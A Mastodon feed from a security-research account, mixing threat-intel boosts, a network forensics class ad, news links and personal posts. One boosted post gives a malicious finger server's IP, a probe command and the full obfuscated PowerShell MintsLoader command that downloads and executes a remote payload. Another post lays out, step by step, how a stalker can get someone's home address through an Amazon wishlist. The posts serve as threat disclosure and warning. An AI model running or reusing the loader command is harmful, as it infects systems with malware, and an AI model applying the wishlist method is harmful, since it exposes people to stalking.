๐Ÿ”CatSalad๐Ÿˆ๐Ÿฅ—ใ€ฐ๏ธโ โ„น๏ธ๊Šโ„‚

250 Followers
213 Following
388 Posts

#๏ธโƒฃCatSalad โ€” I boost/post OSINT, Exploits, and extra-hackery stuff here often

ใ€”๏ธŽ Just looking... pay no attention ใ€•

#Malware #OSINT #DFIR #PenTest

Main (InfoSec)๐Ÿˆhttps://infosec.exchange/@catsalad
๐Ÿ”บโ ๐Ÿฅ—https://indieweb.social/@catsalad
๐Ÿ”ปโ ๐Ÿฅ—https://lor.sh/@catsalad

PSA: The Amazon wishlist doxing threat is much greater and more immediate than folks might realize. Attack works like this:

Stalker who wants your address opens an Amazon seller account and lists themselves as a third party seller for any item on your public wishlist. Then, they order the item from themselves as a gift for you. Bam, they have your address.

In particular, attack does not depend on an existing third party seller having poor PII handling hygiene, like the articles have implied.

RE: https://infosec.exchange/@netresec/115905237000922504

This malicious finger service on 64.190.113.206 (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!

You can probe it with:
nc 64.190.113.206 79 <<< rcaptcha or finger [email protected]

The malicious "finger" service now gives this response:
powershell -w h $huwcsxf='ur' ;set-alias hf7wz32e c$($huwcsxf)l;$infqtmrw=(2231,2243,2243,2239,2185,2174,2174,2237,2248,2224,2229,2243,2245,2249,2177,2173,2243,2238,2239,2174,2176,2173,2239,2231,2239,2190,2242,2188,2177,2180,2226,2179,2180,2228,2229,2228,2172,2176,2177,2225,2183,2172,2179,2228,2176,2227,2172,2225,2184,2175,2225,2172,2227,2225,2225,2224,2182,2226,2228,2227,2177,2176,2224,2226);$zpsmnihtrogcqb=('reicporet','get-cmdlet');$gsrwpaztvi=$infqtmrw;foreach($yxbwqtafvdn in $gsrwpaztvi){$ptwnmclaqfgh=$yxbwqtafvdn;$wyngvtsfirm=$wyngvtsfirm+[char]($ptwnmclaqfgh-2127);$ljfaixwhpztnkv=$wyngvtsfirm; $axfzykqljsnrwc=$ljfaixwhpztnkv};$uecbvofzghikt[2]=$axfzykqljsnrwc;$sdypqv='rl';$gkmvohls=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(hf7wz32e -useb $axfzykqljsnrwc)

#threatintel

Testing please ignore
:3
The early bird discount for our network forensics class expires by the end of this week. Sign up if youโ€™d like to analyze PCAP files together with Erik Hjelmvik (creator of NetworkMiner and PolarProxy).
https://netresec.com/?b=25A2e4f
Online Network Forensics Class

I will teach a live online network forensics training on February 23-26. The full title of the class is Network Forensics for Incident Response, where we will analyze PCAP files containing network traffic from hackers and malware. The training is split into four interactive sessions running from 13:[...]

Netresec

RE: https://infosec.exchange/@mttaggart/113694884783855934

It's 2026 now. Boost if you're ready to destroy genAI entirely.

Microsoft Gave FBI Keys To Unlock Encrypted Data, Exposing Major Privacy Flaw

The tech giant said providing encryption keys was a standard response to a court order. But companies like Apple and Meta set up their systems so such a privacy violation isnโ€™t possible.

Forbes

Have you all seen my dog? Info in the alt.

#dogsOfMastodon

Another top-tier malware analysis writeup. This is a soup-to-nuts breakdown of CastleLoader, with clear explanations at every step.

https://any.run/cybersecurity-blog/castleloader-malware-analysis/

CastleLoader Malware Analysis: Full Execution Breakdown 

Read full-cycle technical analysis of CastleLoader malware, covering its entire multi-stage execution by ANY.RUN.

ANY.RUN's Cybersecurity Blog
Pretty slick breakdown of a new species of Linux C2/Post-Exploitation framework: https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/
VoidLink: The Cloud-Native Malware Framework

The new framework maintains long-term access to Linux systems while operating reliably in cloud and container environments

Check Point Research